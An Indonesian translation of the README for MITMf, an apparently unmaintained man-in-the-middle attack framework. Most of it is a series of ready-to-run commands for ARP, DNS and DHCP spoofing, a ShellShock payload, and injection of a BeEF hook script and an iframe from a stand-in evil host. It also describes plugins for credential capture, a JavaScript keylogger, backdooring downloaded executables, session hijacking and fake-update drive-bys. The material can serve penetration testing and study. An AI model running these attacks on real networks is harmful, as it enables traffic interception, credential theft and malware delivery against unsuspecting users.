Kerangka untuk serangan Man-In-The-Middle
Proyek ini tidak lagi diperbarui. MITMf ditulis untuk memenuhi kebutuhan alat modern untuk melakukan serangan Man-In-The-Middle. Sejak itu banyak alat lain telah dibuat untuk mengisi ruang ini, Anda mungkin harus menggunakan Bettercap karena fiturnya jauh lebih lengkap dan lebih terawat.
Tutorial singkat, contoh, dan pembaruan pengembang di: https://byt3bl33d3r.github.io
Alat ini didasarkan pada sergio-proxy dan merupakan upaya untuk menghidupkan kembali dan memperbarui proyek.
Hubungi saya di:
Twitter: @byt3bl33d3r
IRC di Freenode: #MITMf
Surel: [email protected]
Sebelum mengirimkan masalah, harap baca bagian yang relevan di wiki.
Silakan merujuk ke wiki untuk petunjuk instalasi
MITMf bertujuan untuk menyediakan layanan terpadu untuk serangan Man-In-The-Middle dan jaringan sambil memperbarui dan meningkatkan serangan dan teknik yang ada.
Awalnya dibuat untuk mengatasi kekurangan yang signifikan dari alat lain (misalnya Ettercap, Mallory), alat ini hampir seluruhnya ditulis ulang dari awal untuk menyediakan kerangka kerja modular dan mudah diperluas yang dapat digunakan siapa pun untuk mengimplementasikan serangan MITM mereka sendiri.
Kerangka kerja ini berisi server SMB, HTTP, dan DNS bawaan yang dapat dikontrol dan digunakan oleh berbagai plugin, juga berisi versi modifikasi dari proxy SSLStrip yang memungkinkan modifikasi HTTP dan bypass HSTS parsial.
Pada versi 0.9.8, MITMf mendukung pemfilteran dan manipulasi paket aktif (pada dasarnya apa yang dilakukan etterfilters, hanya saja lebih baik), memungkinkan pengguna untuk memodifikasi semua jenis lalu lintas atau protokol.
File konfigurasi dapat diedit saat MITMf berjalan, perubahan akan diteruskan melalui kerangka kerja: ini memungkinkan Anda untuk mengubah pengaturan plugin dan server saat melakukan serangan.
MITMf akan menangkap FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (string komunitas), NTLMv1/v2 (semua protokol yang didukung seperti HTTP, SMB, LDAP dll.) dan kredensial Kerberos dengan menggunakan Net-Creds, yang dijalankan di rintisan.
Integrasi responden memungkinkan keracunan LLMNR, NBT-NS dan MDNS serta dukungan server jahat WPAD.
Anda sekarang dapat memodifikasi paket/protokol apa pun yang disadap oleh MITMf menggunakan Scapy! (tidak ada lagi filter yang lebih baik! yay!)
Misalnya, inilah filter kecil bodoh yang hanya mengubah alamat IP tujuan paket ICMP:
if packet.haslayer(ICMP): log.info('Punya paket ICMP!') packet.dst = '192.168.1.0'
Gunakan variabel packet
untuk mengakses paket dalam format yang kompatibel dengan Scapy
Gunakan variabel data
untuk mengakses data paket mentah
Sekarang untuk menggunakan filter yang perlu kita lakukan adalah: python mitmf.py -F ~/filter.py
Anda mungkin ingin menggabungkannya dengan plugin Spoof untuk benar-benar mencegat paket dari orang lain;)
Catatan : Anda dapat memodifikasi filter saat itu juga tanpa memulai ulang MITMf!
Penggunaan paling dasar, memulai proxy HTTP SMB, DNS, server HTTP dan Net-Creds pada antarmuka enp3s0:
python mitmf.py -i enp3s0
ARP meracuni seluruh subnet dengan gateway di 192.168.1.1 menggunakan plugin Spoof :
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
Sama seperti di atas + server proxy jahat WPAD menggunakan plugin Responder :
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
Racun ARP 192.168.1.16-45 dan 192.168.0.1/24 dengan gateway di 192.168.1.1:
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
Aktifkan spoofing DNS saat keracunan ARP (Domain yang akan dipalsukan diambil dari file konfigurasi):
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
Aktifkan spoofing LLMNR/NBTNS/MDNS:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
Aktifkan spoofing DHCP (kumpulan ip dan subnet diambil dari file konfigurasi):
python mitmf.py -i enp3s0 --spoof --dhcp
Sama seperti di atas dengan payload ShellShock yang akan dieksekusi jika ada klien yang rentan:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Menyuntikkan IFrame HTML menggunakan plugin Inject :
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Menyuntikkan skrip JS:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
Mulai portal captive yang mengalihkan semuanya ke http://SERVER/PATH:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH
Mulai captive portal di http://your-ip/portal.html menggunakan halaman default /portal.html (thx responder) dan /CaptiveClient.exe (tidak termasuk) dari folder config/captive:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive
Sama seperti di atas tetapi dengan nama host captive.portal, bukan IP (memerlukan captive.portal untuk menyelesaikan IP Anda, misalnya melalui spoof DNS):
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns
Sajikan captive portal dengan instance SimpleHTTPServer tambahan yang melayani LOCALDIR di http://IP:8080 (ubah port di mitmf.config):
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR
Sama seperti di atas tetapi dengan nama host:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns
Dan masih banyak lagi!
Tentu saja Anda dapat mencampur dan mencocokkan hampir semua plugin bersama-sama (misalnya ARP spoof + inject + Responder dll.)
Untuk daftar lengkap opsi yang tersedia, jalankan saja python mitmf.py --help
HTA Drive-By : Menyuntikkan pemberitahuan pembaruan palsu dan meminta klien mengunduh aplikasi HTA
SMBTrap : Memanfaatkan kerentanan 'SMB Trap' pada klien yang terhubung
ScreenShotter : Menggunakan Kanvas HTML5 untuk membuat tangkapan layar akurat dari browser klien
Responden : Peracun LLMNR, NBT-NS, WPAD dan MDNS
SSLstrip+ : Melewati sebagian HSTS
Spoof : Mengalihkan lalu lintas menggunakan spoofing ARP, ICMP, DHCP atau DNS
BeEFAutorun : Menjalankan modul BeEF secara otomatis berdasarkan OS klien atau jenis browser
AppCachePoison : Melakukan serangan keracunan App-Cache HTML5
Ferret-NG : Secara transparan membajak sesi klien
BrowserProfiler : Mencoba menghitung semua plugin browser dari klien yang terhubung
FilePwn : File executable Backdoor dikirim melalui HTTP menggunakan Backdoor Factory dan BDFProxy
Suntikkan : Menyuntikkan konten arbitrer ke dalam konten HTML
BrowserSniper : Melakukan serangan drive-by pada klien dengan plugin browser yang kedaluwarsa
JSkeylogger : Menyuntikkan keylogger Javascript ke halaman web klien
Ganti : Mengganti konten arbitrer dalam konten HTML
SMBAuth : Membangkitkan upaya autentikasi respons tantangan SMB
Upsidedownternet : Membalik gambar 180 derajat
Captive : Membuat portal captive, mengarahkan permintaan HTTP menggunakan 302
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr